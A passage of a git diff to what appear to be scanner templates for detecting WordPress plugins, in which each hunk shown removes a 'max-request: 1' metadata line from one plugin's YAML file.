index 12dffeb534e..20ba5c2e168 100644
--- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml
+++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/really-simple-ssl/
metadata:
- max-request: 1
plugin_namespace: really-simple-ssl
wpscan: https://wpscan.com/plugin/really-simple-ssl
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml
index ae0e76c4bb4..cbcf3cf09d6 100644
--- a/http/technologies/wordpress/plugins/redirection.yaml
+++ b/http/technologies/wordpress/plugins/redirection.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/redirection/
metadata:
- max-request: 1
plugin_namespace: redirection
wpscan: https://wpscan.com/plugin/redirection
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml
index b1718d1ccb8..3311d42c947 100644
--- a/http/technologies/wordpress/plugins/redux-framework.yaml
+++ b/http/technologies/wordpress/plugins/redux-framework.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/redux-framework/
metadata:
- max-request: 1
plugin_namespace: redux-framework
wpscan: https://wpscan.com/plugin/redux-framework
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
index 7543ac1d550..46c1c228053 100644
--- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
+++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/regenerate-thumbnails/
metadata:
- max-request: 1
plugin_namespace: regenerate-thumbnails
wpscan: https://wpscan.com/plugin/regenerate-thumbnails
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml
index 4a29cecdb0e..7c13b8d2a43 100644
--- a/http/technologies/wordpress/plugins/safe-svg.yaml
+++ b/http/technologies/wordpress/plugins/safe-svg.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/safe-svg/
metadata:
- max-request: 1
plugin_namespace: safe-svg
wpscan: https://wpscan.com/plugin/safe-svg
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
index be281d91e63..53b30ba721d 100644
--- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
+++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/seo-by-rank-math/
metadata:
- max-request: 1
plugin_namespace: seo-by-rank-math
wpscan: https://wpscan.com/plugin/seo-by-rank-math
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml
index 6bd95ec0771..9555d7aebdf 100644
--- a/http/technologies/wordpress/plugins/sg-cachepress.yaml
+++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/sg-cachepress/
metadata:
- max-request: 1
plugin_namespace: sg-cachepress
wpscan: https://wpscan.com/plugin/sg-cachepress
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml
index 1fd64a52791..180266f4481 100644
--- a/http/technologies/wordpress/plugins/sg-security.yaml
+++ b/http/technologies/wordpress/plugins/sg-security.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/sg-security/
metadata:
- max-request: 1
plugin_namespace: sg-security
wpscan: https://wpscan.com/plugin/sg-security
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
index 1bb9a283cec..17584cd0642 100644
--- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
+++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/shortcodes-ultimate/
metadata:
- max-request: 1
plugin_namespace: shortcodes-ultimate
wpscan: https://wpscan.com/plugin/shortcodes-ultimate
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
index 7836d9554c9..015fb970437 100644
--- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
+++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/shortpixel-image-optimiser/
metadata:
- max-request: 1
plugin_namespace: shortpixel-image-optimiser
wpscan: https://wpscan.com/plugin/shortpixel-image-optimiser
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
index ccd72e427a5..1d5224b4578 100644
--- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
+++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/simple-custom-post-order/
metadata:
- max-request: 1
plugin_namespace: simple-custom-post-order
wpscan: https://wpscan.com/plugin/simple-custom-post-order
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml
index 3622b2c6b33..aafd6c6a385 100644
--- a/http/technologies/wordpress/plugins/siteguard.yaml
+++ b/http/technologies/wordpress/plugins/siteguard.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/siteguard/
metadata:
- max-request: 1
plugin_namespace: siteguard
wpscan: https://wpscan.com/plugin/siteguard
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml
index 9eff765d61a..e10ab985da4 100644
--- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml
+++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/siteorigin-panels/
metadata:
- max-request: 1
plugin_namespace: siteorigin-panels
wpscan: https://wpscan.com/plugin/siteorigin-panels
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml
index c856e1fa9ec..9881b591ae8 100644
--- a/http/technologies/wordpress/plugins/smart-slider-3.yaml
+++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/smart-slider-3/
metadata:
- max-request: 1
plugin_namespace: smart-slider-3
wpscan: https://wpscan.com/plugin/smart-slider-3
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
index 008440cc581..0480b4b0e68 100644
--- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
+++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/so-widgets-bundle/
metadata:
- max-request: 1
plugin_namespace: so-widgets-bundle
wpscan: https://wpscan.com/plugin/so-widgets-bundle
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
index 410776862f4..26d525386b1 100644
--- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
+++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/stops-core-theme-and-plugin-updates/
metadata:
- max-request: 1
plugin_namespace: stops-core-theme-and-plugin-updates
wpscan: https://wpscan.com/plugin/stops-core-theme-and-plugin-updates
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml
index f210a2a2f9e..3920c5cf56e 100644
--- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml
+++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/sucuri-scanner/
metadata:
- max-request: 1
plugin_namespace: sucuri-scanner
wpscan: https://wpscan.com/plugin/sucuri-scanner
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml
index f1dd1bf150b..f556786f5a7 100644
--- a/http/technologies/wordpress/plugins/svg-support.yaml
+++ b/http/technologies/wordpress/plugins/svg-support.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/svg-support/
metadata:
- max-request: 1
plugin_namespace: svg-support
wpscan: https://wpscan.com/plugin/svg-support
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
index a9ec913599e..844e3d19a07 100644
--- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
+++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/table-of-contents-plus/
metadata:
- max-request: 1
plugin_namespace: table-of-contents-plus
wpscan: https://wpscan.com/plugin/table-of-contents-plus
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml
index d38aeb0279c..eb0f02f602e 100644
--- a/http/technologies/wordpress/plugins/tablepress.yaml
+++ b/http/technologies/wordpress/plugins/tablepress.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/tablepress/
metadata:
- max-request: 1
plugin_namespace: tablepress
wpscan: https://wpscan.com/plugin/tablepress
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
index 07c43b9d808..755efd53fa1 100644
--- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
+++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/taxonomy-terms-order/
metadata:
- max-request: 1
plugin_namespace: taxonomy-terms-order
wpscan: https://wpscan.com/plugin/taxonomy-terms-order
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml
index 83a849e11ed..0403bb4e729 100644
--- a/http/technologies/wordpress/plugins/the-events-calendar.yaml
+++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/the-events-calendar/
metadata:
- max-request: 1
plugin_namespace: the-events-calendar
wpscan: https://wpscan.com/plugin/the-events-calendar
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/themeisle-companion.yaml b/http/technologies/wordpress/plugins/themeisle-companion.yaml
index c6100637d96..cd2632ea051 100644
--- a/http/technologies/wordpress/plugins/themeisle-companion.yaml
+++ b/http/technologies/wordpress/plugins/themeisle-companion.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/themeisle-companion/
metadata:
- max-request: 1
plugin_namespace: themeisle-companion
wpscan: https://wpscan.com/plugin/themeisle-companion
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml
index 1f188b66c6d..b5f8b822c79 100644
--- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml
+++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/tinymce-advanced/
metadata:
- max-request: 1
plugin_namespace: tinymce-advanced
wpscan: https://wpscan.com/plugin/tinymce-advanced
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
index 2c7b16cb44f..85aaf7ff166 100644
--- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
+++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/translatepress-multilingual/
metadata:
- max-request: 1
plugin_namespace: translatepress-multilingual
wpscan: https://wpscan.com/plugin/translatepress-multilingual
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
index 9d6afa8d3f8..0af322b728a 100644
--- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/ultimate-addons-for-gutenberg/
metadata:
- max-request: 1
plugin_namespace: ultimate-addons-for-gutenberg
wpscan: https://wpscan.com/plugin/ultimate-addons-for-gutenberg
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml
index 87721a245a1..d4ac0d179e3 100644
--- a/http/technologies/wordpress/plugins/under-construction-page.yaml
+++ b/http/technologies/wordpress/plugins/under-construction-page.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/under-construction-page/
metadata:
- max-request: 1
plugin_namespace: under-construction-page
wpscan: https://wpscan.com/plugin/under-construction-page
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml
index 45e0dead0e8..dbbadf3cfce 100644
--- a/http/technologies/wordpress/plugins/updraftplus.yaml
+++ b/http/technologies/wordpress/plugins/updraftplus.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/updraftplus/
metadata:
- max-request: 1
plugin_namespace: updraftplus
wpscan: https://wpscan.com/plugin/updraftplus
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/use-any-font.yaml b/http/technologies/wordpress/plugins/use-any-font.yaml
index abec174ec39..401b0e479f8 100644
--- a/http/technologies/wordpress/plugins/use-any-font.yaml
+++ b/http/technologies/wordpress/plugins/use-any-font.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/use-any-font/
metadata:
- max-request: 1
plugin_namespace: use-any-font
wpscan: https://wpscan.com/plugin/use-any-font
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml
index e088ac07a65..6f95506748a 100644
--- a/http/technologies/wordpress/plugins/user-role-editor.yaml
+++ b/http/technologies/wordpress/plugins/user-role-editor.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/user-role-editor/
metadata:
- max-request: 1
plugin_namespace: user-role-editor
wpscan: https://wpscan.com/plugin/user-role-editor
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
index 8b163200bf1..4404f87aab8 100644
--- a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
+++ b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/velvet-blues-update-urls/
metadata:
- max-request: 1
plugin_namespace: velvet-blues-update-urls
wpscan: https://wpscan.com/plugin/velvet-blues-update-urls
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml
index 2366a7dad79..8995434fcea 100644
--- a/http/technologies/wordpress/plugins/w3-total-cache.yaml
+++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/w3-total-cache/
metadata:
- max-request: 1
plugin_namespace: w3-total-cache
wpscan: https://wpscan.com/plugin/w3-total-cache
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
index 71448e61e8c..8175806cb8d 100644
--- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
+++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/webp-converter-for-media/
metadata:
- max-request: 1
plugin_namespace: webp-converter-for-media
wpscan: https://wpscan.com/plugin/webp-converter-for-media
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml
index 717554b89fd..db82bc7f43e 100644
--- a/http/technologies/wordpress/plugins/webp-express.yaml
+++ b/http/technologies/wordpress/plugins/webp-express.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/webp-express/
metadata:
- max-request: 1
plugin_namespace: webp-express
wpscan: https://wpscan.com/plugin/webp-express
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
index fba5c8b09c2..03ddae57bc9 100644
--- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
+++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/widget-importer-exporter/
metadata:
- max-request: 1
plugin_namespace: widget-importer-exporter
wpscan: https://wpscan.com/plugin/widget-importer-exporter
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
index 631202198ef..d6449bb5bf1 100644
--- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
+++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/woo-cart-abandonment-recovery/
metadata:
- max-request: 1
plugin_namespace: woo-cart-abandonment-recovery
wpscan: https://wpscan.com/plugin/woo-cart-abandonment-recovery
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
index cc953078ebc..2d5fdf17793 100644
--- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
+++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/woo-checkout-field-editor-pro/
metadata:
- max-request: 1
plugin_namespace: woo-checkout-field-editor-pro
wpscan: https://wpscan.com/plugin/woo-checkout-field-editor-pro
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
index 97ce6741165..6b5705e20d1 100644
--- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
+++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/woo-variation-swatches/
metadata:
- max-request: 1
plugin_namespace: woo-variation-swatches
wpscan: https://wpscan.com/plugin/woo-variation-swatches
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
index 6d05a6f058b..dbcdb64badb 100644
--- a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/woocommerce-gateway-paypal-express-checkout/
metadata:
- max-request: 1
plugin_namespace: woocommerce-gateway-paypal-express-checkout
wpscan: https://wpscan.com/plugin/woocommerce-gateway-paypal-express-checkout
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
index baf5af3bb57..fb9ea502ce8 100644
--- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/woocommerce-gateway-stripe/
metadata:
- max-request: 1
plugin_namespace: woocommerce-gateway-stripe
wpscan: https://wpscan.com/plugin/woocommerce-gateway-stripe
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml
index aa1898c4ba5..48ffb25245e 100644
--- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/woocommerce-payments/
metadata:
- max-request: 1
plugin_namespace: woocommerce-payments
wpscan: https://wpscan.com/plugin/woocommerce-payments
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
index 5fae796fdd6..4fa6fc3ffed 100644
--- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/woocommerce-paypal-payments/
metadata:
- max-request: 1
plugin_namespace: woocommerce-paypal-payments
wpscan: https://wpscan.com/plugin/woocommerce-paypal-payments
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
index 22f812e2b8f..1c1c690fcd0 100644
--- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/
metadata:
- max-request: 1
plugin_namespace: woocommerce-pdf-invoices-packing-slips
wpscan: https://wpscan.com/plugin/woocommerce-pdf-invoices-packing-slips
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml
index c637006d269..4d6702d81af 100644
--- a/http/technologies/wordpress/plugins/woocommerce-services.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/woocommerce-services/
metadata:
- max-request: 1
plugin_namespace: woocommerce-services
wpscan: https://wpscan.com/plugin/woocommerce-services
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml
index e020507ccbe..42cb8bc4099 100644
--- a/http/technologies/wordpress/plugins/woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/woocommerce/
metadata:
- max-request: 1
plugin_namespace: woocommerce
wpscan: https://wpscan.com/plugin/woocommerce
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml
index c92903fd796..55d6effbf55 100644
--- a/http/technologies/wordpress/plugins/wordfence.yaml
+++ b/http/technologies/wordpress/plugins/wordfence.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/wordfence/
metadata:
- max-request: 1
plugin_namespace: wordfence
wpscan: https://wpscan.com/plugin/wordfence
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml
index c25b2c1c483..6786cab7035 100644
--- a/http/technologies/wordpress/plugins/wordpress-importer.yaml
+++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/wordpress-importer/
metadata:
- max-request: 1
plugin_namespace: wordpress-importer
wpscan: https://wpscan.com/plugin/wordpress-importer
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml
index 4d6dd14d25f..784ba22c8aa 100644
--- a/http/technologies/wordpress/plugins/wordpress-seo.yaml
+++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/wordpress-seo/
metadata:
- max-request: 1
plugin_namespace: wordpress-seo
wpscan: https://wpscan.com/plugin/wordpress-seo
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml
index 7ca0870ed61..72ff55e58a2 100644
--- a/http/technologies/wordpress/plugins/worker.yaml
+++ b/http/technologies/wordpress/plugins/worker.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/worker/
metadata:
- max-request: 1
plugin_namespace: worker
wpscan: https://wpscan.com/plugin/worker
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
index 4f0d9be5685..8cfaa0f5a96 100644
--- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
+++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/wp-fastest-cache/
metadata:
- max-request: 1
plugin_namespace: wp-fastest-cache
wpscan: https://wpscan.com/plugin/wp-fastest-cache
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml
index f3c481b8248..85900a01a76 100644
--- a/http/technologies/wordpress/plugins/wp-file-manager.yaml
+++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/wp-file-manager/
metadata:
- max-request: 1
plugin_namespace: wp-file-manager
wpscan: https://wpscan.com/plugin/wp-file-manager
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml
index ba214fd7ea4..a7ccde0b49f 100644
--- a/http/technologies/wordpress/plugins/wp-google-maps.yaml
+++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/wp-google-maps/
metadata:
- max-request: 1
plugin_namespace: wp-google-maps
wpscan: https://wpscan.com/plugin/wp-google-maps
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
index 8f5fe8d9a5c..422664a98cc 100644
--- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
+++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/wp-mail-smtp/
metadata:
- max-request: 1
plugin_namespace: wp-mail-smtp
wpscan: https://wpscan.com/plugin/wp-mail-smtp
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
index 0458b133540..f0af3a748a6 100644
--- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
+++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/wp-maintenance-mode/
metadata:
